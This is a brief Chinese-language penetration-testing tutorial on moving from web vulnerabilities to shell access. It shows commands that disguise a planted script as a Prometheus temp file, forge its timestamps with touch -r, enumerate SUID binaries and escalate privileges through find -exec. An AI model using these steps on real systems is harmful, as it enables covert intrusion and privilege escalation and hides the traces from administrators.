简介
我们知道前端安全包括了SQL注入,任意文件上传,XSS,CSRF,逻辑漏洞,跨域漏洞等等,我们可以将这些漏洞加以利用或组合来进行getshell的。在这里我们再区分一下getshell和webshell的区别,webshell更多的是获取前端的权限,顾名思义,一般仅限于前端或文件的增删改查;那么getshell则是获取更大的权限。一般的思路为挖掘漏洞,通过漏洞加以组合或利用获取webshell或后台权限,之后再进一步getshell。
文件属性修改
重命名文件
mv 1.sh prometheus-mmap202203
修改文件创建时间
这里就复刻了prometheus-mmap20220330-1580-x94lwp的属性,创建了一个同属性的prometheus-mmap202203
touch -r prometheus-mmap20220330-1580-x94lwp prometheus-mmap202203
提权
我们可以通过一下命令发现系统上运行所有suid可执行文件。不同系统命令不同。
find / -perm -u=s -type f 2>/dev/null
方式
我们首先查看具有root用户权限的SUID文件
find / -perm -u=s -type f 2>/dev/null
/usr/bin/find
/usr/bin/chfn
/usr/bin/kismet_cap_rz_killerbee
/usr/bin/ntfs-3g
发现find信息,利用find提权执行命令
└─$ /usr/bin/find /etc/opt -exec whoami \;